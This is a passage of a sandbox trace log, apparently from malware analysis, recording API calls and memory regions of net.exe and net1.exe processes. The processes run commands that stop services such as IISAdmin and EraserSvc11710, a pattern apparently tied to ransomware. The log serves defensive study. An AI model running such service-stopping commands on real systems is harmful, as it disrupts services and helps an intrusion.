0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 5578 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 5579 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 5580 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 5581 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 5582 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 5583 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 5584 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 5585 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 5586 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 5587 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 5588 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 5589 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5590 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5591 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 5592 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 5593 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 5594 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5595 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 524 os_tid = 0x1378 [0094.639] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfd90 | out: lpSystemTimeAsFileTime=0x1cfd90*(dwLowDateTime=0xed93d8b0, dwHighDateTime=0x1d48689)) [0094.639] GetCurrentProcessId () returned 0x1374 [0094.639] GetCurrentThreadId () returned 0x1378 [0094.639] GetTickCount () returned 0x21795 [0094.639] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfd98 | out: lpPerformanceCount=0x1cfd98*=1814155700000) returned 1 [0094.641] GetModuleHandleW (lpModuleName=0x0) returned 0xff8d0000 [0094.641] __set_app_type (_Type=0x1) [0094.641] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff8e9c9c) returned 0x0 [0094.641] __getmainargs (in: _Argc=0xff8f4780, _Argv=0xff8f4790, _Env=0xff8f4788, _DoWildCard=0, _StartInfo=0xff8f479c | out: _Argc=0xff8f4780, _Argv=0xff8f4790, _Env=0xff8f4788) returned 0 [0094.641] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0094.641] GetConsoleOutputCP () returned 0x1b5 [0094.642] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff8fcec0 | out: lpCPInfo=0xff8fcec0) returned 1 [0094.643] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0094.646] sprintf_s (in: _DstBuf=0x1cfd38, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0094.647] setlocale (category=0, locale=".437") returned="English_United States.437" [0094.649] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0094.649] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0094.649] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop EraserSvc11710 /y" [0094.649] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1cfad0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0094.649] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0094.649] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1cfd28 | out: Buffer=0x1cfd28*=0x344d50) returned 0x0 [0094.649] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1cfd28 | out: Buffer=0x1cfd28*=0x34c100) returned 0x0 [0094.649] _fileno (_File=0x7fefdba2a80) returned 0 [0094.649] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0094.649] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0094.649] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0094.649] _wcsicmp (_String1="config", _String2="stop") returned -16 [0094.649] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0094.650] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0094.650] _wcsicmp (_String1="file", _String2="stop") returned -13 [0094.650] _wcsicmp (_String1="files", _String2="stop") returned -13 [0094.650] _wcsicmp (_String1="group", _String2="stop") returned -12 [0094.650] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0094.650] _wcsicmp (_String1="help", _String2="stop") returned -11 [0094.650] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0094.650] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0094.650] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0094.650] _wcsicmp (_String1="session", _String2="stop") returned -15 [0094.650] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0094.650] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0094.650] _wcsicmp (_String1="share", _String2="stop") returned -12 [0094.650] _wcsicmp (_String1="start", _String2="stop") returned -14 [0094.650] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0094.650] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0094.650] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0094.650] _wcsicmp (_String1="accounts", _String2="EraserSvc11710") returned -4 [0094.650] _wcsicmp (_String1="computer", _String2="EraserSvc11710") returned -2 [0094.650] _wcsicmp (_String1="config", _String2="EraserSvc11710") returned -2 [0094.650] _wcsicmp (_String1="continue", _String2="EraserSvc11710") returned -2 [0094.650] _wcsicmp (_String1="cont", _String2="EraserSvc11710") returned -2 [0094.650] _wcsicmp (_String1="file", _String2="EraserSvc11710") returned 1 [0094.650] _wcsicmp (_String1="files", _String2="EraserSvc11710") returned 1 [0094.650] _wcsicmp (_String1="group", _String2="EraserSvc11710") returned 2 [0094.650] _wcsicmp (_String1="groups", _String2="EraserSvc11710") returned 2 [0094.650] _wcsicmp (_String1="help", _String2="EraserSvc11710") returned 3 [0094.650] _wcsicmp (_String1="helpmsg", _String2="EraserSvc11710") returned 3 [0094.650] _wcsicmp (_String1="localgroup", _String2="EraserSvc11710") returned 7 [0094.650] _wcsicmp (_String1="pause", _String2="EraserSvc11710") returned 11 [0094.651] _wcsicmp (_String1="session", _String2="EraserSvc11710") returned 14 [0094.651] _wcsicmp (_String1="sessions", _String2="EraserSvc11710") returned 14 [0094.651] _wcsicmp (_String1="sess", _String2="EraserSvc11710") returned 14 [0094.651] _wcsicmp (_String1="share", _String2="EraserSvc11710") returned 14 [0094.651] _wcsicmp (_String1="start", _String2="EraserSvc11710") returned 14 [0094.651] _wcsicmp (_String1="stats", _String2="EraserSvc11710") returned 14 [0094.651] _wcsicmp (_String1="statistics", _String2="EraserSvc11710") returned 14 [0094.651] _wcsicmp (_String1="stop", _String2="EraserSvc11710") returned 14 [0094.651] _wcsicmp (_String1="time", _String2="EraserSvc11710") returned 15 [0094.651] _wcsicmp (_String1="user", _String2="EraserSvc11710") returned 16 [0094.651] _wcsicmp (_String1="users", _String2="EraserSvc11710") returned 16 [0094.651] _wcsicmp (_String1="msg", _String2="EraserSvc11710") returned 8 [0094.651] _wcsicmp (_String1="messenger", _String2="EraserSvc11710") returned 8 [0094.651] _wcsicmp (_String1="receiver", _String2="EraserSvc11710") returned 13 [0094.651] _wcsicmp (_String1="rcv", _String2="EraserSvc11710") returned 13 [0094.651] _wcsicmp (_String1="netpopup", _String2="EraserSvc11710") returned 9 [0094.651] _wcsicmp (_String1="redirector", _String2="EraserSvc11710") returned 13 [0094.651] _wcsicmp (_String1="redir", _String2="EraserSvc11710") returned 13 [0094.651] _wcsicmp (_String1="rdr", _String2="EraserSvc11710") returned 13 [0094.651] _wcsicmp (_String1="workstation", _String2="EraserSvc11710") returned 18 [0094.651] _wcsicmp (_String1="work", _String2="EraserSvc11710") returned 18 [0094.651] _wcsicmp (_String1="wksta", _String2="EraserSvc11710") returned 18 [0094.651] _wcsicmp (_String1="prdr", _String2="EraserSvc11710") returned 11 [0094.651] _wcsicmp (_String1="devrdr", _String2="EraserSvc11710") returned -1 [0094.651] _wcsicmp (_String1="lanmanworkstation", _String2="EraserSvc11710") returned 7 [0094.651] _wcsicmp (_String1="server", _String2="EraserSvc11710") returned 14 [0094.651] _wcsicmp (_String1="svr", _String2="EraserSvc11710") returned 14 [0094.651] _wcsicmp (_String1="srv", _String2="EraserSvc11710") returned 14 [0094.651] _wcsicmp (_String1="lanmanserver", _String2="EraserSvc11710") returned 7 [0094.651] _wcsicmp (_String1="alerter", _String2="EraserSvc11710") returned -4 [0094.651] _wcsicmp (_String1="netlogon", _String2="EraserSvc11710") returned 9 [0094.651] _wcsupr (in: _String="EraserSvc11710" | out: _String="ERASERSVC11710") returned="ERASERSVC11710" [0094.652] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x34ce10 [0095.129] GetServiceKeyNameW (in: hSCManager=0x34ce10, lpDisplayName="ERASERSVC11710", lpServiceName=0xff8f5750, lpcchBuffer=0x1cfc48 | out: lpServiceName="", lpcchBuffer=0x1cfc48) returned 0 [0095.130] _wcsicmp (_String1="msg", _String2="ERASERSVC11710") returned 8 [0095.130] _wcsicmp (_String1="messenger", _String2="ERASERSVC11710") returned 8 [0095.130] _wcsicmp (_String1="receiver", _String2="ERASERSVC11710") returned 13 [0095.130] _wcsicmp (_String1="rcv", _String2="ERASERSVC11710") returned 13 [0095.130] _wcsicmp (_String1="redirector", _String2="ERASERSVC11710") returned 13 [0095.130] _wcsicmp (_String1="redir", _String2="ERASERSVC11710") returned 13 [0095.130] _wcsicmp (_String1="rdr", _String2="ERASERSVC11710") returned 13 [0095.130] _wcsicmp (_String1="workstation", _String2="ERASERSVC11710") returned 18 [0095.130] _wcsicmp (_String1="work", _String2="ERASERSVC11710") returned 18 [0095.130] _wcsicmp (_String1="wksta", _String2="ERASERSVC11710") returned 18 [0095.130] _wcsicmp (_String1="prdr", _String2="ERASERSVC11710") returned 11 [0095.130] _wcsicmp (_String1="devrdr", _String2="ERASERSVC11710") returned -1 [0095.130] _wcsicmp (_String1="lanmanworkstation", _String2="ERASERSVC11710") returned 7 [0095.131] _wcsicmp (_String1="server", _String2="ERASERSVC11710") returned 14 [0095.131] _wcsicmp (_String1="svr", _String2="ERASERSVC11710") returned 14 [0095.131] _wcsicmp (_String1="srv", _String2="ERASERSVC11710") returned 14 [0095.131] _wcsicmp (_String1="lanmanserver", _String2="ERASERSVC11710") returned 7 [0095.131] _wcsicmp (_String1="alerter", _String2="ERASERSVC11710") returned -4 [0095.131] _wcsicmp (_String1="netlogon", _String2="ERASERSVC11710") returned 9 [0095.131] NetServiceControl (in: servername=0x0, service="ERASERSVC11710", opcode=0x0, arg=0x0, bufptr=0x1cfc50 | out: bufptr=0x1cfc50) returned 0x889 [0095.132] wcscpy_s (in: _Destination=0xff8f80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0095.132] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0095.134] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff8f5b50, nSize=0x800, Arguments=0xff8f7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0095.136] GetFileType (hFile=0xb) returned 0x2 [0095.136] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cfb18 | out: lpMode=0x1cfb18) returned 1 [0095.136] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff8f5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x1cfb10, lpReserved=0x0 | out: lpBuffer=0xff8f5b50*, lpNumberOfCharsWritten=0x1cfb10*=0x1e) returned 1 [0095.137] GetFileType (hFile=0xb) returned 0x2 [0095.137] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cfb18 | out: lpMode=0x1cfb18) returned 1 [0095.137] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff8d1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1cfb10, lpReserved=0x0 | out: lpBuffer=0xff8d1efc*, lpNumberOfCharsWritten=0x1cfb10*=0x2) returned 1 [0095.138] _ultow (in: _Dest=0x889, _Radix=1899392 | out: _Dest=0x889) returned="2185" [0095.138] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff8f5b50, nSize=0x800, Arguments=0xff8f7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0095.138] GetFileType (hFile=0xb) returned 0x2 [0095.138] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cfb18 | out: lpMode=0x1cfb18) returned 1 [0095.138] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff8f5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x1cfb10, lpReserved=0x0 | out: lpBuffer=0xff8f5b50*, lpNumberOfCharsWritten=0x1cfb10*=0x34) returned 1 [0095.139] GetFileType (hFile=0xb) returned 0x2 [0095.139] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cfb18 | out: lpMode=0x1cfb18) returned 1 [0095.140] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff8d1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1cfb10, lpReserved=0x0 | out: lpBuffer=0xff8d1efc*, lpNumberOfCharsWritten=0x1cfb10*=0x2) returned 1 [0095.140] NetApiBufferFree (Buffer=0x344d50) returned 0x0 [0095.140] NetApiBufferFree (Buffer=0x34c100) returned 0x0 [0095.140] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop EraserSvc11710 /y" [0095.140] exit (_Code=2) Process: id = "117" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x65112000" os_pid = "0x1380" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop IISAdmin /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5596 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5597 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5598 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5599 start_va = 0x190000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 5600 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5601 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 5602 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5603 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 5604 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5605 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 5606 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 5607 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 5608 start_va = 0x290000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 5609 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5610 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5611 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5612 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 5613 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5614 start_va = 0x390000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 5615 start_va = 0x510000 end_va = 0x51ffff entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 5616 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 5617 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 5618 start_va = 0x7fef43a0000 end_va = 0x7fef43b1fff entry_point = 0x7fef43a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 5619 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 5620 start_va = 0x7fefaf50000 end_va = 0x7fefaf5afff entry_point = 0x7fefaf50000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 5621 start_va = 0x7fefaf60000 end_va = 0x7fefaf86fff entry_point = 0x7fefaf60000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 5622 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 5623 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 5624 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 5625 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 5626 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5627 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5628 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 5629 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 5630 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Thread: id = 525 os_tid = 0x1384 Process: id = "118" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x6142c000" os_pid = "0xf20" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "117" os_parent_pid = "0x1380" cmd_line = "C:\\Windows\\system32\\net1 stop IISAdmin /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5631 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5632 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5633 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5634 start_va = 0x1f0000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 5635 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5636 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 5637 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5638 start_va = 0xffd10000 end_va = 0xffd42fff entry_point = 0xffd10000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 5639 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5640 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 5641 start_va = 0x7fffffdd000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 5642 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 5643 start_va = 0x350000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 5644 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5645 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5646 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5647 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 5648 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5649 start_va = 0x150000 end_va = 0x15ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 5650 start_va = 0x450000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 5651 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 5652 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 5653 start_va = 0x7fef43a0000 end_va = 0x7fef43b1fff entry_point = 0x7fef43a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 5654 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: 